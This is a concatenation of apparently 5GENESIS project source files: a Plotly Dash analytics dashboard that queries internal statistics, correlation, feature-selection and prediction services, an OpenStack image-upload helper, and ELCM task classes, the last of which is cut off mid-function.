# dcc.Graph(id='graph_no_outliers')
# # download link
# dbc.Row(dbc.Col(
# html.A(
# 'Download Raw Data',
# id='download-link',
# download="",
# href="",
# target="_blank"
# )
# ))
]),
# Statistical Analysis tab
dcc.Tab(label='Statistical Analysis', value='stat-analysis-tab', children=[
# graph
dbc.Row(dbc.Col(
dcc.Graph(id='box_plot')
)),
# table
dbc.Row(dbc.Col([
html.H4(children='Test Case Statistics'),
dash_table.DataTable(
id='table',
columns=[
{'name': 'Indicator', 'id': 'Indicator'},
{'name': 'Value', 'id': 'Value', 'type': 'numeric',
'format': Format(precision=2, scheme=Scheme.fixed)},
{'name': 'Confidence Interval', 'id': 'Confidence Interval', 'type': 'numeric',
'format': Format(precision=2, scheme=Scheme.fixed)}
]
),
# # download links
# html.Div(
# html.A(
# 'Download Per Iteration Statistics',
# id='iteration_download',
# download="",
# href="",
# target="_blank"
# ),
# ),
# html.Div(
# html.A(
# 'Download Test Case Statistics',
# id='test_case_download',
# download="",
# href="",
# target="_blank"
# )
# )
], width=6), justify='center')
]),
# Correlation tab
dcc.Tab(label='Correlation', value='correlation-tab', children=[
dcc.Tabs(id="corr-tabs", value="cross-correlation-tab", children=[
# Correlation Matrix
dcc.Tab(label='Cross-correlation of fields within the same experiment', value="cross-correlation-tab", children=[
dbc.Row(dbc.Col([
html.Div('Correlation method', style={'margin-top': '20px'}),
dcc.Dropdown(
options=[
{'value': 'pearson', 'label': 'Pearson correlation coefficient'},
{'value': 'kendall', 'label': 'Kendall Tau correlation coefficient'},
{'value': 'spearman', 'label': 'Spearman rank correlation'}
],
value='pearson',
id='correlation-method',
searchable=False,
clearable=False
)
], width=3)),
dbc.Row(dbc.Col(
dcc.Graph(id='correlation_graph')
)),
# dbc.Row(dbc.Col(
# # download link
# html.A(
# 'Download Correlation Matrix Data',
# id='corr_matrix_download',
# download="",
# href="",
# target="_blank"
# )
# ))
]),
# Correlation table
dcc.Tab(label='Correlation of fields between two different experiments', value='experiment-correlation-tab', children=[
dbc.Row(dbc.Col([
html.Div('Pick Second Experiment ID', style={'margin-top': '20px'}),
dcc.Dropdown(id='experiment2'),
html.Br()
], width=3), justify='center'),
dbc.Row(dbc.Col(
dash_table.DataTable(
id='correlation_table',
columns=[
{'name': 'Correlation Field', 'id': 'Correlation Field', 'type': 'text'},
{'name': 'Value', 'id': 'Value', 'type': 'numeric', 'format': Format(precision=2, scheme=Scheme.fixed)}
], style_data={'width': '250px'}
), width='auto'
), justify='center'),
# dbc.Row(dbc.Col(
# # download link
# html.A(
# 'Download Correlation Table Data',
# id='corr_table_download',
# download="",
# href="",
# target="_blank"
# )
# ))
])
])
]),
# Feature Selection tab
dcc.Tab(label='Feature Selection', value='feature-selection-tab', children=[
# hidden division to store data
html.Div(id='feature_score', style={'display': 'none'}),
dbc.Row([
dbc.Col([
# Options
html.Div('Select Algorithm', style={'margin-top': '20px'}),
dcc.Dropdown(
options=[
{'label': 'Backward Elimination', 'value': 'backward'},
{'label': 'RFE', 'value': 'rfe'},
{'label': 'Lasso', 'value': 'lasso'}
],
value='lasso',
id='method',
searchable=False,
clearable=False
)
], width=2),
dbc.Col([
html.Div('Drop Features', style={'margin-top': '20px'}),
dcc.Dropdown(
id='drop_features',
multi=True
)
], width=3),
dbc.Col([
html.Div('Normalize (for RFE)', style={'margin-top': '20px'}),
dcc.RadioItems(
options=[
{'label': 'Yes', 'value': 'true'},
{'label': 'No', 'value': 'false'},
],
value='true',
id='normalize',
labelStyle={'display': 'inline-block', 'margin-top': '5px'}
)
], width='auto'),
dbc.Col([
html.Div('Alpha (for Lasso)', style={'margin-top': '20px'}),
dcc.Input(
id='alpha',
type='number',
value=0.1,
min=0, max=10, step=0.1
)
], width='auto')
]),
dbc.Row(dbc.Col(dcc.Graph(id='feature_bar'))),
# dbc.Row(dbc.Col(
# # download link
# html.A(
# 'Download Feature Selection Scores',
# id='features_download',
# download="",
# href="",
# target="_blank"
# )
# ))
]),
# Prediction tab
dcc.Tab(label='Prediction', value='prediction-tab', children=[
dbc.Row([
# Options
dbc.Col([
html.Div('Select Algorithm', style={'margin-top': '20px'}),
dcc.Dropdown(
options=[
{'label': 'Linear Regression',
'value': 'linreg'},
{'label': 'Random Forest',
'value': 'rf'},
{'label': 'SVR', 'value': 'svr'}
],
value='linreg',
id='algorithm',
searchable=False,
clearable=False
)
], width=2),
dbc.Col([
html.Div('Drop Features', style={'margin-top': '20px'}),
dcc.Dropdown(
id='drop_features_pred',
multi=True
)
], width=3),
dbc.Col(
dbc.Button('Automatic feature selection', id='drop_features_button', color='light', style={'margin-top': '43px'}),
width="auto"
),
dbc.Col(
dbc.Button('Train model', id='train_button', style={'margin-top': '43px'}),
width="auto"
)
]),
dbc.Row(
# Prediction values graph
dbc.Col(dbc.Col(dcc.Graph(id='predicted_values_graph')))
),
dbc.Row([
# Prediction results
dbc.Col(
html.Div([
html.H4('Training results'),
dash_table.DataTable(
id='prediction_result_table',
columns=[
{
'name': 'Metric',
'id': 'Metric',
'type': 'text'
}, {
'name': 'Value',
'id': 'Value',
'type': 'numeric',
'format': Format(precision=2, scheme=Scheme.fixed)
}
]
)
], style={'text-align': 'center'}), width=4
),
# Coefficient table
dbc.Col(
html.Div([
html.H4('Model coefficients'),
dash_table.DataTable(
id='prediction_coefficient_table',
columns=[
{
'name': 'Feature',
'id': 'Feature',
'type': 'text'
}, {
'name': 'Value',
'id': 'Value',
'type': 'numeric',
'format': Format(precision=4, scheme=Scheme.fixed)
}
]
)
], style={'text-align': 'center'}), width=4
)
], justify="around"),
dbc.Row(
dbc.Col(
html.A(
dbc.Button('Download model', id='download_button', style={'margin-bottom': '50px'}),
id='model_download_link',
href=None
), width="auto"
), justify="center"
)
])
])
])
])
], fluid=True)
def empty_figure(title='No data'):
return {
'data': [{'x': 0, 'y': 0}],
'layout': {'title': title}
}
empty_fig = empty_figure()
kpi_filter_list = ['Available RAM', 'PacketsReceived', 'Total RAM', 'Used CPU Per Cent', 'Used RAM', 'Used RAM Per Cent', # malaga old names
'host', 'Cell ID', 'Cell',
'facility', 'facility_x', 'facility_y',
'Success', 'Success_x', 'Success_y',
'hostname', 'hostname_x', 'hostname_y',
'appname', 'appname_x', 'appname_y',
'series', 'series_x', 'series_y',
'_iteration_', '_iteration__x', '_iteration__y',
'ExecutionId', 'ExecutionId_x', 'ExecutionId_y', 'Timestamp_x', 'Timestamp_y',
'Operator', 'DateTime', 'Network', 'LAC', 'PSC',
'AWGN State', 'Verdict']
meas_filter_list = ['execution_metadata', 'syslog']
# callback to return experiment ID options
@app.callback(
[Output('experiment', 'options'),
Output('experiment', 'value')],
[Input('url', 'search'),
Input('datasource', 'value')])
def experimentID_list(search, datasource):
if not search or not datasource:
return [], None
start = datetime.now()
params = parse_qs(urlparse(search).query)
token = params['token'][0]
if token == secret:
link = f'http://data_handler:5000/get_all_experimentIds/{datasource}'
r = requests.get(link)
experiment_list = list(r.json().values())[0]
experiment_target = None
else:
experiment_target, experiment_list = decoder.Decode(token)
if experiment_target and experiment_target not in experiment_list:
experiment_list += [experiment_target]
print(f"-- experimentID_list: {datetime.now()-start}", flush=True)
return [{'label': item, 'value': item} for item in sorted(experiment_list)], experiment_target
# callback to return measurement options
@app.callback(
[Output('measurement', 'options'),
Output('measurement', 'value')],
[Input('experiment', 'value')],
[State('datasource', 'value')])
def find_measurement(experiment, datasource):
if not experiment or not datasource:
return [], None
start = datetime.now()
link = f'http://data_handler:5000/get_measurements_for_experimentId/{datasource}/{experiment}'
r = requests.get(link)
meas_list = list(r.json().values())[0]
temp = []
for i in meas_list:
if i not in meas_filter_list: # to avoid having measurement tables which raise errors
temp.append({'label': i, 'value': i})
print(f"-- find_measurement: {datetime.now()-start}", flush=True)
return temp, None
# callback used to store the df in a hidden division
@app.callback(
Output('df', 'children'),
[Input('measurement', 'value'),
Input('outlier', 'value'),
Input('datasource', 'value'),
Input('experiment', 'value'),
Input('time_resolution', 'value'),
Input('purge_cache_button', 'n_clicks')])
def retrieve_df(measurement, outlier, datasource, experiment, time_resolution, purge_cache):
    # Input check - this order is required (the value is initially None and becomes a list once filled)
if not measurement or not experiment or not time_resolution:
# empty_df = pd.DataFrame(data={})
return None
context = dash.callback_context
if context and context.triggered[0]['prop_id'].split('.')[0] == 'purge_cache_button':
requests.get('http://data_handler:5000/purge_cache')
return None
start = datetime.now()
link = f'http://data_handler:5000/get_data/{datasource}/{experiment}'
param_dict = {
'match_series': False,
'measurement': measurement,
'max_lag': time_resolution,
'remove_outliers': outlier
}
r = requests.get(link, params=param_dict)
print(f"-- retrieve_df: {datetime.now()-start}", flush=True)
# return df.to_json()
return r.text
@app.callback(
[Output('kpi', 'options'),
Output('kpi', 'value')],
[Input("df", "children")])
def update_dropdown(df):
if not df:
return [], None
start = datetime.now()
temp = []
df = pd.read_json(df)
for i in df.columns:
if not len(df[i].dropna()) == 0 and i not in kpi_filter_list:
temp.append({'label': i, 'value': i})
print(f"-- update_dropdown: {datetime.now()-start}", flush=True)
return temp, None
###
# Time Series Overview tab
###
# Time series graph
@app.callback(
Output('graph', 'figure'),
[Input('kpi', 'value'),
Input("outlier", 'value'),
Input('tabs', 'value')],
[State("df", "children")])
def update_graph(kpi, outlier, tab, df):
# input check
if not kpi or not df or not outlier or tab != "time-series-tab":
return empty_fig
start = datetime.now()
df = pd.read_json(df)
traces = []
for i in range(len(kpi)):
feature = kpi[i]
series = df[feature]
series.reset_index(drop=True, inplace=True)
traces.append(go.Scatter(
x=df.index,
y=series,
mode='lines',
name=feature,
yaxis=f"y{i+1}" if i > 0 else 'y'
))
figure = {
'data': traces,
'layout': {
'title': 'Time Series',
'xaxis': {
'title': 'Samples',
'domain': [0, 1 - (len(kpi) - 1) * 0.06],
'titlefont': {
'family': 'Helvetica, monospace',
'size': 20,
'color': '#7f7f7f'
}
},
'yaxis': {
'title': kpi[0],
'titlefont': {
'family': 'Helvetica, monospace',
'size': 20,
'color': plotly.colors.DEFAULT_PLOTLY_COLORS[0]
},
'tickfont': {
'color': plotly.colors.DEFAULT_PLOTLY_COLORS[0]
}
},
"showlegend": False
}
}
for i in range(1, len(kpi)):
figure['layout'][f'yaxis{i+1}'] = {
'title': kpi[i],
'titlefont': {
'family': 'Helvetica, monospace',
'size': 20,
'color': plotly.colors.DEFAULT_PLOTLY_COLORS[i]
},
'tickfont': {
'color': plotly.colors.DEFAULT_PLOTLY_COLORS[i]
},
'overlaying': 'y',
'side': 'right',
'position': 1 - i * 0.06
}
print(f"-- update_graph: {datetime.now()-start}", flush=True)
return figure
###
# Statistical Analysis tab
###
# callback used to store the statistical analysis dataframes
@app.callback(
[Output("it_stat_df", "children"),
Output("test_case_stat_df", "children")],
[Input('kpi', 'value'),
Input('datasource', 'value'),
Input('tabs', 'value')],
[State('measurement', 'value'),
State('experiment', 'value')])
def retrieve_stats(kpi, datasource, tab, measurement, experiment):
if not kpi or not experiment or tab != 'stat-analysis-tab':
empty_df = pd.DataFrame(data={})
return empty_df.to_json(), empty_df.to_json()
else:
link = f'http://statistical_analysis:5003/statistical_analysis/{datasource}'
param_dict = {
'experimentid': experiment,
'kpi': kpi[0], # .replace(" ","%20")
'measurement': measurement
}
r = requests.get(link, params=param_dict)
data = r.json()
if not data['experimentid'][experiment]:
return pd.DataFrame().to_json(), pd.DataFrame().to_json()
temp = data['experimentid'][experiment][kpi[0]]
df1 = pd.DataFrame.from_dict(temp['Iteration Statistics'], orient='index').reset_index()
test_case_stat_df = pd.DataFrame.from_dict(temp['Test Case Statistics'], orient='index').reset_index()
df1.rename(columns={'index': 'Iteration'}, inplace=True)
test_case_stat_df.rename(columns={'index': 'Indicator'}, inplace=True)
return df1.to_json(), test_case_stat_df.to_json()
# return box plot
@app.callback(
Output('box_plot', 'figure'),
[Input('kpi', 'value'),
Input("tabs", "value")],
[State("df", "children")])
def update_box_plot_graph(kpi, tab, df):
if not kpi or not df or tab != 'stat-analysis-tab':
return empty_fig
else:
kpi = kpi[0]
df = pd.read_json(df)
it_list = None
if '_iteration_' in df:
it_list = df._iteration_.unique()
if it_list is None or len(it_list) < 2:
return empty_figure(title='<b style="color:red">Warning: No iteration recorded in the data!</b>')
N = len(df._iteration_.unique()) + 1
c = ['hsl(' + str(h) + ',50%' + ',50%)' for h in np.linspace(0, 360, N)]
trace = []
for it in range(len(it_list)):
temp = df[df._iteration_ == it]
trace.append(go.Box(y=temp[kpi], name=f'{it}', marker_color=c[it]))
figure = {
'data': trace,
'layout': {
'title': 'Per-Iteration Statistics',
'xaxis': dict(
title='Iteration',
tickmode='array',
tickvals=list(range(N)),
titlefont=dict(
family='Helvetica, monospace',
size=20,
color='#7f7f7f'
)),
'yaxis': dict(
title=kpi,
titlefont=dict(
family='Helvetica, monospace',
size=20,
color='#7f7f7f'
)),
"showlegend": False
}
}
return figure
# return test case statistics table
@app.callback(
Output('table', 'data'),
[Input('test_case_stat_df', 'children'),
Input("tabs", "value")])
def update_table(test_case_stat_df, tab):
if not test_case_stat_df or len(test_case_stat_df) == 2 or tab != 'stat-analysis-tab':
return [{'Indicator': None, 'Value': None, 'Confidence Interval': None}]
else:
df = pd.read_json(test_case_stat_df)
return df.to_dict('records')
# # callback used to return the download link for the raw data
# @app.callback([
# Output('download-link', 'href'),
# Output('download-link', 'download')],
# [Input('df', 'children'),
# Input('datasource', 'value'),
# Input("tabs", "value")],
# [State('measurement', 'value'),
# State('experiment', 'value')])
# def update_download_link_raw(df, datasource, tab, measurement, experiment):
# if not df or len(df) == 2 or tab != 'stat-analysis-tab':
# csv_string = None
# download_string = None
# else:
# dff = pd.read_json(df)
# csv_string = dff.to_csv(index=False, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'raw_{datasource}_{experiment}_{measurement}.csv'
# return csv_string, download_string
# # callbacks to return download links for statistical analysis
# @app.callback([
# Output('iteration_download', 'href'),
# Output('iteration_download', 'download')],
# [Input('it_stat_df', 'children'),
# Input('kpi', 'value'),
# Input('datasource', 'value'),
# Input("tabs", "value")],
# [State('measurement', 'value'),
# State('experiment', 'value')])
# def update_download_link_stat_data(it_stat_df, kpi, datasource, tab, measurement, experiment):
# if not it_stat_df or len(it_stat_df) == 2 or tab != 'stat-analysis-tab':
# csv_string = None
# download_string = None
# else:
# dff = pd.read_json(it_stat_df)
# csv_string = dff.to_csv(index=False, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'per_it_stats_{datasource}_{experiment}_{measurement}_{kpi}.csv'
# return csv_string, download_string
# # callbacks to return download links for test case
# @app.callback([
# Output('test_case_download', 'href'),
# Output('test_case_download', 'download')],
# [Input('test_case_stat_df', 'children'),
# Input('kpi', 'value'),
# Input('datasource', 'value'),
# Input("tabs", "value")],
# [State('measurement', 'value'),
# State('experiment', 'value')])
# def update_download_link_test_case(test_case_stat_df, kpi, datasource, tab, measurement, experiment):
# if not test_case_stat_df or tab != 'stat-analysis-tab':
# csv_string = None
# download_string = None
# else:
# dff = pd.read_json(test_case_stat_df)
# csv_string = dff.to_csv(index=False, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'test_case_stats_{datasource}_{experiment}_{measurement}_{kpi}.csv'
# return csv_string, download_string
###
# Correlation tab
###
###
# Field Correlation sub tab
###
# correlation matrix callback
@app.callback(
Output('correlation_graph', 'figure'),
# Output('corr_matrix_download_data', 'children'),
[Input('outlier', 'value'),
Input('measurement', 'value'),
Input("tabs", "value"),
Input("corr-tabs", "value"),
Input('kpi', 'value'),
Input('correlation-method', 'value')],
[State('experiment', 'value'),
State('datasource', 'value')])
def correlation_matrix(outlier, measurement, tab, corr_tab, kpis, correlation_method, experiment, datasource):
if not measurement or not outlier or tab != "correlation-tab" or corr_tab != "cross-correlation-tab":
return empty_fig
start = datetime.now()
link = f'http://correlation:5001/correlate/fields/{datasource}/{experiment}'
param_dict = {
'measurement': measurement,
'field': kpis,
'remove_outliers': outlier,
'method': correlation_method
}
r = requests.get(link, params=param_dict)
data = r.json()
df = pd.DataFrame(data['correlation_matrix']).select_dtypes(exclude=object).dropna(how='all')
x = df.columns
y = df.index[::-1]
z = df.values[::-1]
figure = {
'data': [
{
'type': 'heatmap',
'x': x,
'y': y,
'z': z,
'zmin': -1,
'zmax': 1,
'colorscale': [[0, 'red'], [0.5, 'white'], [1.0, 'green']]
}
],
'layout': {
'title': '<b>Correlation Matrix</b><br>Mouseover to read the exact data (x and y labels with corresponding correlation weight).',
'margin': {'l': 250, 'r': 250, 'b': 120}, # margin to avoid label cut - hardcoded because 'auto' doesn't work
'height': max(450, 20 * len(x))
},
'frames': []
}
# download_data = pd.DataFrame(temp).to_json()
print(f"-- correlation_matrix: {datetime.now()-start}", flush=True)
return figure
# return figure, download_data
# # download link for correlation matrix data
# @app.callback(
# [Output('corr_matrix_download', 'href'),
# Output('corr_matrix_download', 'download')],
# [Input('corr_matrix_download_data', 'children'),
# Input("tabs", "value"),
# Input("corr-tabs", "value")],
# [State('datasource', 'value'),
# State('measurement', 'value'),
# State('outlier', 'value'),
# State('experiment', 'value'),
# ])
# def update_download_link_correlation(corr_matrix_download_data, tab, corr_tab, datasource, measurement, outlier, experiment):
# if not corr_matrix_download_data or tab != "correlation-tab" or corr_tab != "cross-correlation-tab":
# csv_string = None
# download_string = None
# else:
# df_temp1 = pd.read_json(corr_matrix_download_data)
# df_temp2 = df_temp1.dropna(how='all') # drop rows where all elements are empty
# df = df_temp2.dropna(axis=1, how='all') # drop columns where all elements are empty
# csv_string = df.to_csv(index=True, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'correlation_matrix_data_{datasource}_{experiment}_{measurement}_{outlier}.csv'
# return csv_string, download_string
###
# Cross experiment correlation sub tab
###
# callback to return experiment2 ID options
@app.callback(
Output('experiment2', 'options'),
[Input('experiment', 'value'),
Input('experiment', 'options'),
Input("corr-tabs", "value")],
[State("tabs", "value")])
def find_second_experimentID(experiment, experiments, corr_tab, tab):
if experiment and experiments and tab == "correlation-tab" and corr_tab == "experiment-correlation-tab":
return experiments
else:
return []
# return correlation table
@app.callback(
Output('correlation_table', 'data'),
# Output('corr_table_download_data', 'children')],
[Input('outlier', 'value'),
Input('experiment', 'value'),
Input('experiment2', 'value'),
Input('measurement', 'value'),
Input('kpi', 'value'),
Input('datasource', 'value'),
Input("tabs", "value"),
Input("corr-tabs", "value")],
[State('correlation-method', 'value')])
def update_experiment_correlation_table(outlier, experiment, experiment2, measurement, kpis, datasource, tab, corr_tab, correlation_method):
if not experiment2 or not measurement or tab != "correlation-tab" or corr_tab != "experiment-correlation-tab":
correlation_list = []
# download_data = None
else:
if measurement is not None:
link = f'http://correlation:5001/correlate/experiments/{datasource}/{experiment}/{experiment2}'
param_dict = {
'measurement': measurement,
'field': kpis,
'remove_outliers': outlier,
'method': correlation_method
}
r = requests.get(link, params=param_dict)
if r.status_code != 200:
return []
data = r.json()
temp = data['correlation_list']
correlation_list = []
for k, v in temp.items():
if not pd.isna(v):
correlation_list.append({'Correlation Field': k, 'Value': v})
# download_data = pd.DataFrame(correlation_list).to_json()
return correlation_list
# return correlation_list, download_data
# # download link for correlation table data
# @app.callback(
# [Output('corr_table_download', 'href'),
# Output('corr_table_download', 'download')],
# [Input('corr_table_download_data', 'children'),
# Input('datasource', 'value'),
# Input('measurement', 'value'),
# Input('outlier', 'value'),
# Input('experiment', 'value'),
# Input('experiment2', 'value'),
# Input('kpi', 'value'),
# Input("tabs", "value"),
# Input("corr-tabs", "value")])
# def update_download_link_experiment_correlation(corr_table_download_data, datasource, measurement, outlier, experiment, experiment2, kpi, tab, corr_tab):
# if not corr_table_download_data or tab != "correlation-tab" or corr_tab != "experiment-correlation-tab":
# csv_string = None
# download_string = None
# else:
# df_temp = pd.read_json(corr_table_download_data)
# df = df_temp.reset_index(drop=True) # sets rows in increasing order
# csv_string = df.to_csv(index=True, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'correlation_table_data_{datasource}_{experiment}_{experiment2}_{measurement}_{kpi}_{outlier}.csv'
# return csv_string, download_string
###
# Feature Selection tab
###
# Drop feature dropdown list
@app.callback(
Output('drop_features', 'options'),
[Input('kpi', 'value'),
Input("tabs", "value")],
[State('df', 'children')])
def update_drop_features(kpi, tab, df):
# input check
if not df or not kpi or tab != "feature-selection-tab": # len(df) <= 0 or kpi == None:
return []
start = datetime.now()
df = pd.read_json(df).select_dtypes(exclude=object).dropna(how='all', axis=1)
print(f"-- update_table: {datetime.now()-start}", flush=True)
    return [{'label': i, 'value': i} for i in df.drop(columns=kpi).columns]
# return bar plot of features importance
@app.callback([
Output('feature_bar', 'figure'),
Output('feature_score', 'children')],
[Input('kpi', 'value'),
Input("tabs", "value"),
Input("outlier", 'value'),
Input('method', 'value'),
Input("drop_features", "value"),
Input('normalize', 'value'),
Input('alpha', 'value')],
[State('datasource', 'value'),
State('measurement', 'value'),
State('experiment', 'value')])
def update_featureselection_graph(kpi, tab, outlier, method, drop_features, normalize, alpha, datasource, measurement, experiment):
if not kpi or not experiment or not measurement or not alpha or tab != "feature-selection-tab":
return empty_fig, None
start = datetime.now()
kpi = kpi[0]
kpi = kpi.replace(" ", "%20")
link = f'http://feature_selection:5004/selection/{datasource}/{method}/{kpi}'
param_dict = {
'experimentid': experiment,
'remove_outliers': outlier,
'alpha': alpha,
'normalize': normalize,
'drop_feature': drop_features,
'measurement': measurement
}
r = requests.get(link, params=param_dict)
data = r.json()['Score']
df = pd.DataFrame.from_dict(data, orient='index')
if sum(df[0]) == 0:
title = "<b>Feature selection cannot be performed on this feature since it is constant over time.</b><br>Running the same analysis with no outlier detection (set to 'None') may solve this issue for some of the features in the dataset."
else:
title = "Score"
figure = {
'data': [go.Bar(
y=list(data.values()),
x=list(data.keys())
)],
'layout': {
'title': title,
'xaxis': dict(
title='Features',
tickangle=30,
tickfont=dict(family='Rockwell', size=10),
titlefont=dict(
family='Helvetica, monospace',
size=16,
color='#7f7f7f'
))
}
}
print(f"-- update_featureselection_graph: {datetime.now()-start}", flush=True)
return figure, df.to_json()
# # callback which returns download link for feature scores
# @app.callback([
# Output('features_download', 'href'),
# Output('features_download', 'download')],
# [Input('feature_score', 'children'),
# Input('kpi', 'value'),
# Input('method', 'value'),
# Input("tabs", "value")],
# [State('datasource', 'value'),
# State('measurement', 'value'),
# State('experiment', 'value')])
# def update_download_link(feature_score, kpi, method, tab, datasource, measurement, experiment):
# if not feature_score or len(feature_score) == 2 or tab != "feature-selection-tab":
# csv_string = None
# download_string = None
# else:
# dff = pd.read_json(feature_score)
# csv_string = dff.to_csv(index=True, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'test_case_stats_{datasource}_{experiment}_{measurement}_{kpi}_{method}.csv'
# return csv_string, download_string
###
# Prediction tab
###
# Train button, which saves the model training results in a hidden Div
@app.callback(
[Output("prediction_results_df", "children"),
Output('model_download_link', 'href')],
[Input("train_button", 'n_clicks')],
[State('datasource', 'value'),
State('algorithm', 'value'),
State('kpi', 'value'),
State('experiment', 'value'),
State('drop_features_pred', 'value'),
State('drop_features_pred', 'options'),
State('measurement', 'value'),
State("outlier", "value"),
State('time_resolution', 'value'),
State("tabs", "value")])
def train_model(train_button, datasource, algorithm, target, experimentid, drop_features, drop_features_available, measurements, remove_outliers, time_resolution, tab):
if not datasource or not algorithm or not target or not experimentid or not measurements or tab != "prediction-tab":
return None, None
if drop_features and len(drop_features_available) == len(drop_features): # This happens when all features are selected for dropping and none remain
return None, None
target = target[0].replace(' ', '%20')
start = datetime.now()
param_dict = {
'experimentid': experimentid,
'drop_feature': drop_features,
'measurement': measurements,
'remove_outliers': remove_outliers,
'max_lag': time_resolution
}
r = requests.get(f'http://prediction:5002/train/{datasource}/{algorithm}/{target}', params=param_dict)
results = r.json()
print(f"-- train_model: {datetime.now()-start}", flush=True)
return json.dumps(results), f"/prediction/model/{algorithm}"
# Populate drop feature dropdown list
@app.callback(
Output('drop_features_pred', 'options'),
[Input('kpi', 'value'),
Input("tabs", "value")],
[State('df', 'children')])
def update_drop_features_prediction(kpi, tab, df):
if not df or not kpi or tab != "prediction-tab":
return []
start = datetime.now()
df = pd.read_json(df).select_dtypes(exclude=object).dropna(how='all', axis=1)
print(f"-- update_table: {datetime.now()-start}", flush=True)
    return [{'label': i, 'value': i} for i in df.drop(columns=kpi).columns]
# Run feature selection for the prediction by pressing the drop feature button
@app.callback(
Output('drop_features_pred', 'value'),
[Input('drop_features_button', 'n_clicks')],
[State('datasource', 'value'),
State('method', 'value'),
State('kpi', 'value'),
State('experiment', 'value'),
State('outlier', 'value'),
State('alpha', 'value'),
State('normalize', 'value'),
State('measurement', 'value'),
State('drop_features_pred', 'options')])
def select_features_for_prediction(drop_features_button, datasource, method, kpi, experiment, outlier, alpha, normalize, measurements, all_features):
if not datasource or not kpi or not experiment or not measurements or not all_features:
return None
kpi = kpi[0] # .replace(' ', '%20')
all_features = [item['value'] for item in all_features]
selected_features = []
link = f'http://feature_selection:5004/selection/{datasource}/{method}/{kpi}'
param_dict = {
'experimentid': experiment,
'remove_outliers': outlier,
'alpha': alpha,
'normalize': normalize,
'measurement': measurements
}
r = requests.get(link, params=param_dict)
data = r.json()
selected_features = data['Features - Selected']
return [item for item in all_features if item not in selected_features]
# Results table
@app.callback(
Output('prediction_result_table', 'data'),
[Input("prediction_results_df", "children")],
[State("tabs", "value")])
def update_prediction_results_table(prediction_results_df, tab):
if not prediction_results_df or tab != 'prediction-tab':
return [{'Metric': None, 'Value': None}]
else:
results = json.loads(prediction_results_df)
return [{'Metric': k, 'Value': v} for k, v in results['results'].items() if k in [
'Cross-val R2 score (mean)',
'Cross-val explained_variance score (mean)',
'Explained variance score',
'Mean Absolute Error',
'Mean Squared Error',
'Prediction mean',
'Prediction std',
'R2 score',
'Test mean',
'Test std',
'Train mean',
'Train std']]
# Actual vs predicted graph
@app.callback(
Output('predicted_values_graph', 'figure'),
[Input("prediction_results_df", "children")],
[State("tabs", "value"),
State('kpi', 'value')])
def update_prediction_graph(prediction_results_df, tab, kpi):
if not prediction_results_df or tab != 'prediction-tab':
return empty_fig
start = datetime.now()
results = json.loads(prediction_results_df)
figure = {
'data': [go.Scatter(x=[float(item) for item in results['real_predicted_values']['y_test'].values()],
y=[float(item) for item in results['real_predicted_values']['y_pred'].values()],
name=kpi[0],
mode='markers')],
'layout': {
'title': f'Predicted vs actual values for {kpi[0]}',
'xaxis': dict(
title='Actual',
titlefont=dict(
family='Helvetica, monospace',
size=20,
color='#7f7f7f'
)),
'yaxis': dict(
title='Predicted',
titlefont=dict(
family='Helvetica, monospace',
size=20,
color='#7f7f7f'
))
}
}
print(f"-- update_prediction_graph: {datetime.now()-start}", flush=True)
return figure
# Coefficients table
@app.callback(
Output('prediction_coefficient_table', 'data'),
[Input("prediction_results_df", "children")],
[State("tabs", "value")])
def update_prediction_coefficients_table(prediction_results_df, tab):
if not prediction_results_df or tab != 'prediction-tab':
return [{'Feature': None, 'Value': None}]
else:
results = json.loads(prediction_results_df)
return [{'Feature': k, 'Value': v} for k, v in results['coefficients'].items()]
@app.server.route('/prediction/model/<string:algorithm>')
def download_model(algorithm):
model = requests.get('http://prediction:5002/model').content
return send_file(
BytesIO(model),
mimetype='application/octet-stream',
as_attachment=True,
attachment_filename=algorithm + '.pickle'
)
def get_secret():
try:
with open("/run/secrets/analytics_secret", 'r') as secret_file:
return secret_file.read().strip()
except IOError:
return None
if __name__ == '__main__':
secret = get_secret()
decoder = Crypt(secret=secret)
app.run_server(host='0.0.0.0', port=5005, debug=False)
``` |
{
"source": "5genesis/Dispatcher",
"score": 2
} |
#### File: mano/libs/openstack_util.py
```python
import openstack
import os
class OSUtils:
    @staticmethod
    def connection(auth_url, region, project_name, username, password):
        # NOTE: 'region' is accepted but not forwarded to openstack.connect()
return openstack.connect(
auth_url=auth_url,
project_name=project_name,
username=username,
password=password,
user_domain_name="Default",
project_domain_name="Default",
)
    @staticmethod
    def upload_image(conn, f, disk_format="raw", container_format="bare"):
# Build the image attributes and upload the image.
filename_without_extension, file_extension = os.path.splitext(f)
image_attrs = {
'name': filename_without_extension,
'filename': f,
'disk_format': disk_format,
'container_format': container_format,
# 'visibility': 'public',
}
return conn.image.create_image(**image_attrs)
    @staticmethod
    def import_image(conn):
# Url where glance can download the image
uri = 'https://download.cirros-cloud.net/0.4.0/' \
'cirros-0.4.0-x86_64-disk.img'
# Build the image attributes and import the image.
image_attrs = {
'name': 'prueba_borrar',
'disk_format': 'qcow2',
'container_format': 'bare',
'visibility': 'public',
}
image = conn.image.create_image(**image_attrs)
conn.image.import_image(image, method="web-download", uri=uri)
    @staticmethod
    def list_images(conn):
for image in conn.image.images():
print(image)
``` |
{
"source": "5genesis/ELCM",
"score": 2
} |
#### File: Tasks/Run/cli_execute.py
```python
from Task import Task
from Helper import Cli
class CliExecute(Task):
def __init__(self, logMethod, parent, params):
super().__init__("CLI Execute", parent, params, logMethod, None)
def Run(self):
parameters = self.params['Parameters']
cwd = self.params['CWD']
cli = Cli(parameters, cwd, self.logMethod)
cli.Execute()
```
#### File: Tasks/Run/publish_from_source.py
```python
from Task import Task
from Helper import Level
from typing import Dict
import re
class PublishFromSource(Task):
def __init__(self, name, parent, params, logMethod):
super().__init__(name, parent, params, logMethod, None)
def Run(self):
self.Log(Level.INFO, f'Running task {self.name} with params: {self.params}')
filePath = self.params.get("Path", None)
pattern = self.params.get("Pattern", None)
keys = self.params.get("Keys", None)
if pattern is None:
